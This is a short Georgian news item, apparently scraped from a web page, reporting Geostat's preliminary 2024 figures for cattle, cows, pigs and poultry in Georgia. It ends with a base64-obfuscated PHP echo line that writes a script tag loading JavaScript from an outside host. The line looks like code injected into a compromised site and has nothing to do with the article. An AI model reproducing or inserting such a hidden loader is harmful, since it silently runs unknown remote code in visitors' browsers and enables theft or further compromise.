celsiusi
ავერსი jaluzi

საქართველოში შინაური ცხოველების რაოდენობა ბოლო წლების ყველაზე დაბალ ნიშნულზეა. საქსტატის წინასწარი მონაცემებით, 2024 წლის ბოლოსათვის მსხვილფეხა რქოსანი პირუტყვის სულადობამ 811.5 ათასი სული შეადგინა, რაც წინა წლის მონაცემზე 3.1 პროცენტით ნაკლებია. 2023 წელს 838 ათასი სული პირუტყვი აღირიცხებოდა.

აქედან ფურისა და ფურკამეჩის ჯამური რაოდენობა 397.8 ათასი სულით განისაზღვრა, რაც წინა წლის ანალოგიურ მაჩვენებელს 5.0 პროცენტით ჩამორჩება (2023 წელს - 419 ათასი სული). ღორის რაოდენობა 129.4 ათასი სული შეადგინა, რაც 8.6 პროცენტით ჩამორჩება წინა წლის შესაბამის მაჩვენებელს (2023 წელს - 142 ათასი სული).

რაც შეეხება ფრინველის რაოდენობას, საქსტატის მონაცემებით 2024 წელს 7.9 მლნ. ფრთა შეადგინა, რაც 3.4 პროცენტით აღემატება წინა წლის ანალოგიურ მაჩვენებელს (2023 წელს - 7.629 მლნ ფრთა).

83
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");